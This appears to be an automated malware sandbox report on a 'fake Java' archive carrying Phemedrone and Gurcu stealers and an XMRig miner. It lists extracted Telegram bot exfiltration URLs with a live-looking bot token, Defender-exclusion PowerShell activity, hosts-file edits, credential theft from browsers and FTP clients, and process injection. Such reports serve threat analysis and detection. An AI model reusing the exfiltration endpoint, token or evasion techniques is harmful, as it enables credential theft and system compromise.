Analysis
-
max time kernel
76s -
max time network
84s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
23-11-2024 19:10
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY
Resource
win10ltsc2021-20241023-en
General
-
Target
https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY
Malware Config
Extracted
phemedrone
https://api.telegram.org/bot7409385165:AAHDnOsiLDMwjv8rdk_VLf2May0J5Oj0YjI/sendDocument
Extracted
gurcu
https://api.telegram.org/bot7409385165:AAHDnOsiLDMwjv8rdk_VLf2May0J5Oj0YjI/sendDocumen
Signatures
-
Gurcu family
-
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/6124-724-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/6124-728-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/6124-726-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/6124-727-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/6124-725-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/6124-722-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/6124-721-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/6124-734-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1132 powershell.exe 2744 powershell.exe 4940 powershell.exe 5936 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts java8.exe File created C:\Windows\system32\drivers\etc\hosts zrgqfbcavrkx.exe -
Executes dropped EXE 7 IoCs
pid Process 5512 java8.exe 5580 optionsof.exe 4428 zrgqfbcavrkx.exe 3368 java8.exe 5452 optionsof.exe 5816 zrgqfbcavrkx.exe 3532 zrgqfbcavrkx.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5916 powercfg.exe 5908 powercfg.exe 5900 powercfg.exe 2852 powercfg.exe 5852 powercfg.exe 5880 powercfg.exe 5660 powercfg.exe 5892 powercfg.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe java8.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe zrgqfbcavrkx.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4428 set thread context of 6092 4428 zrgqfbcavrkx.exe 166 PID 4428 set thread context of 6124 4428 zrgqfbcavrkx.exe 170 -
resource yara_rule behavioral1/memory/6124-717-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-724-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-728-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-726-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-727-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-725-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-722-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-721-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-720-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-719-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-718-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-716-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/6124-734-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5720 sc.exe 5712 sc.exe 5736 sc.exe 5936 sc.exe 5940 sc.exe 6088 sc.exe 5612 sc.exe 5576 sc.exe 3116 sc.exe 5536 sc.exe 5840 sc.exe 5660 sc.exe 5756 sc.exe 3272 sc.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 perfmon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz perfmon.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Software\Microsoft\Internet Explorer\TypedURLs taskmgr.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings 7zFM.exe Key created \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings firefox.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\7zO0E198148\pass - 1512okul.txt:Zone.Identifier 7zFM.exe File created C:\Users\Admin\Downloads\infected-fakejava.rar:Zone.Identifier firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4576 7zFM.exe 4576 7zFM.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5580 optionsof.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4576 7zFM.exe 4568 perfmon.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2540 firefox.exe Token: SeDebugPrivilege 2540 firefox.exe Token: 33 4640 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4640 AUDIODG.EXE Token: SeDebugPrivilege 2540 firefox.exe Token: SeRestorePrivilege 4576 7zFM.exe Token: 35 4576 7zFM.exe Token: SeSecurityPrivilege 4576 7zFM.exe Token: SeSecurityPrivilege 4576 7zFM.exe Token: SeSecurityPrivilege 4576 7zFM.exe Token: SeRestorePrivilege 5140 7zFM.exe Token: 35 5140 7zFM.exe Token: SeSecurityPrivilege 5140 7zFM.exe Token: SeDebugPrivilege 5580 optionsof.exe Token: SeDebugPrivilege 5984 taskmgr.exe Token: SeSystemProfilePrivilege 5984 taskmgr.exe Token: SeCreateGlobalPrivilege 5984 taskmgr.exe Token: SeDebugPrivilege 4568 perfmon.exe Token: SeSystemProfilePrivilege 4568 perfmon.exe Token: SeCreateGlobalPrivilege 4568 perfmon.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeIncreaseQuotaPrivilege 1132 powershell.exe Token: SeSecurityPrivilege 1132 powershell.exe Token: SeTakeOwnershipPrivilege 1132 powershell.exe Token: SeLoadDriverPrivilege 1132 powershell.exe Token: SeSystemProfilePrivilege 1132 powershell.exe Token: SeSystemtimePrivilege 1132 powershell.exe Token: SeProfSingleProcessPrivilege 1132 powershell.exe Token: SeIncBasePriorityPrivilege 1132 powershell.exe Token: SeCreatePagefilePrivilege 1132 powershell.exe Token: SeBackupPrivilege 1132 powershell.exe Token: SeRestorePrivilege 1132 powershell.exe Token: SeShutdownPrivilege 1132 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeSystemEnvironmentPrivilege 1132 powershell.exe Token: SeRemoteShutdownPrivilege 1132 powershell.exe Token: SeUndockPrivilege 1132 powershell.exe Token: SeManageVolumePrivilege 1132 powershell.exe Token: 33 1132 powershell.exe Token: 34 1132 powershell.exe Token: 35 1132 powershell.exe Token: 36 1132 powershell.exe Token: SeShutdownPrivilege 5908 powercfg.exe Token: SeCreatePagefilePrivilege 5908 powercfg.exe Token: SeShutdownPrivilege 5892 powercfg.exe Token: SeCreatePagefilePrivilege 5892 powercfg.exe Token: SeShutdownPrivilege 5916 powercfg.exe Token: SeCreatePagefilePrivilege 5916 powercfg.exe Token: SeShutdownPrivilege 5900 powercfg.exe Token: SeCreatePagefilePrivilege 5900 powercfg.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2744 powershell.exe Token: SeIncreaseQuotaPrivilege 2744 powershell.exe Token: SeSecurityPrivilege 2744 powershell.exe Token: SeTakeOwnershipPrivilege 2744 powershell.exe Token: SeLoadDriverPrivilege 2744 powershell.exe Token: SeSystemtimePrivilege 2744 powershell.exe Token: SeBackupPrivilege 2744 powershell.exe Token: SeRestorePrivilege 2744 powershell.exe Token: SeShutdownPrivilege 2744 powershell.exe Token: SeSystemEnvironmentPrivilege 2744 powershell.exe Token: SeUndockPrivilege 2744 powershell.exe Token: SeManageVolumePrivilege 2744 powershell.exe Token: SeShutdownPrivilege 5852 powercfg.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 4576 7zFM.exe 4576 7zFM.exe 4576 7zFM.exe 4576 7zFM.exe 4576 7zFM.exe 5140 7zFM.exe 5140 7zFM.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe 2540 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2592 wrote to memory of 2540 2592 firefox.exe 80 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 4272 2540 firefox.exe 81 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 PID 2540 wrote to memory of 1928 2540 firefox.exe 82 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY"1⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc8d2628-0abc-4e38-860b-699d916f7c51} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" gpu3⤵PID:4272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24601 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33311f25-d0de-4c04-921b-10be1f4e5ffb} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" socket3⤵PID:1928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3128 -childID 1 -isForBrowser -prefsHandle 3120 -prefMapHandle 3116 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7636a4f4-a985-4f48-9555-aa57967d5ad9} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab3⤵PID:5024
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 2 -isForBrowser -prefsHandle 3632 -prefMapHandle 3628 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d717ebd1-d36a-4d43-bcdc-f94e4b63149e} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab3⤵PID:2668
-
-
